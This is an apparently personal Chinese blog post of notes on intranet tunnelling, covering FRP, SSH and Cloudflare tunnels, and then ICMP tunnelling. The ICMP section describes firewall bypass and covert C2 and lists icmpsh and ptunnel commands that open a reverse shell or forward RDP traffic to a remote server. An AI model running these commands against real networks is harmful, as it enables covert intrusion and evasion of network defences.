31.内网穿透

内网穿透

一、概念

把局域网内网主机暴露到公网,外网可直接访问内网设备、服务。

二、常见用途

远程运维内网服务器、本地项目外网调试、内网端口对外访问。

三、主流方式

  1. FRP

    (最常用)

    客户端部署内网机,服务端放公网 VPS,端口映射转发。

  2. NAT123 / 花生壳

    图形化傻瓜式,适合个人简易穿透。

  3. SSH 隧道

    轻便临时穿透,无需额外软件。

  4. Cloudflare Tunnel

    免费无公网 IP,外网访问本地服务。

四、FRP 核心流程

  1. 公网服务器部署 frps 服务端
  2. 内网机器运行 frpc 客户端,连接服务端
  3. 配置端口映射,外网 IP + 端口访问内网服务

五、常用隧道类型

  • 端口转发:单端口映射
  • TCP/UDP:协议穿透
  • HTTP/HTTPS:网站服务穿透

ngork内网穿透

https://zhuanlan.zhihu.com/p/1923395574637507575

frp内网穿透

https://zhuanlan.zhihu.com/p/1913504354721333378

icmp隧道

ICMP 隧道是一种把 TCP/UDP/IP 流量封装在ICMP Echo(ping)包的数据字段里进行传输的隐蔽通信技术。

通俗讲:用 ping 包 “夹带私货”,把本来不能过防火墙的流量,伪装成正常 ping 流量穿过边界设备。

  • 特点:无端口、无连接、防火墙普遍放行、普通用户即可发起
  • 典型用途:内网出网、防火墙绕过、隐蔽 C2、反弹 Shell

常见工具(实战常用)

1)icmpsh(最经典,Windows/Linux)

  • 客户端(目标机):icmpsh.exe -t 服务端IP
  • 服务端(VPS,Linux):./icmpsh_m.py 0.0.0.0
  • 效果:反弹 cmd/bash,纯 ICMP,无端口

2)pingtunnel(ptunnel,全平台,支持 TCP 转发)

如果防火墙不允许3389tcp流量通过 可以转icmp协议

  • 服务端:ptunnel -x 密码
  • 客户端:ptunnel -p 服务端IP -x 密码 -l 本地端口 -r 目标IP:目标端口
  • 场景:把本地端口流量通过 ICMP 隧道转发到内网目标(如 3389、22)

3)h2ping /icmptunnel(Linux 内核级)

  • 直接创建虚拟网卡(tun),所有 IP 流量走 ICMP
  • 适合全局代理、内网穿透
posted @ 2026-09-03 20:33  hello422000  阅读(19)  评论(0)    收藏  举报